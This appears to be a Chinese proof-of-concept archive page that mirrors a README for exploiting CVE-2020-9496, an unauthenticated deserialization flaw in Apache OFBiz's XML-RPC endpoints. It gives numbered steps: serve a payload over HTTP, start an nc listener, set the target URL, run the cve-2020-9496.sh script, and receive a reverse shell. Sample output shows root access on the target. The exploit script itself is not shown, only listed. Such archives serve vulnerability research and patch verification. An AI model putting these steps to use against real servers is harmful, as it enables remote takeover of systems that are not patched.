关联漏洞
标题:Apache OFBiz 代码问题漏洞 (CVE-2020-9496)Description:Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。 Apache OFBiz 17.12.03版本中存在代码问题漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
介绍
# CVE-2020-9496
Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization.
This issue was reported to the security team by Alvaro Munoz <pwntester@github.com> from the GitHub Security Lab team.
# Affected Version 17.12.01
# Fixed Versions 18.12.01, 17.12.04
Original Blog: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
Apache's Post: https://issues.apache.org/jira/browse/OFBIZ-11716
Github's POC: https://github.com/g33xter/CVE-2020-9496
In order to make this exploit work, you will need to make the following steps:
### Step 1: Host HTTP Service with python3
```
> sudo python3 -m http.server 80
```
### Step 2: Run nc listener in the desired port (Recommended 8001)
```
> nc -nlvp 8001
```
### Step 3: Change Website's URL and Port inside the script:
```
url='https://127.0.0.1' # CHANGE THIS
port=8443 # CHANGE THIS
```
### Step 4: Run the exploit as shown below
```
> ./cve-2020-9496.sh -i IP -p PORT
```
### Step 5: Check nc listener
```
❯ nc -nlvp 8001
listening on [any] 8001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.x.x] 57500
bash: cannot set terminal process group (31): Inappropriate ioctl for device
bash: no job control in this shell
root@poc:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
root@poc:/usr/src/apache-ofbiz-17.12.01#
```
文件快照
[4.0K] /data/pocs/e78aec149b48df303dc749dcfb86cd588eecff2a
├── [3.0K] cve-2020-9496.sh
└── [1.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。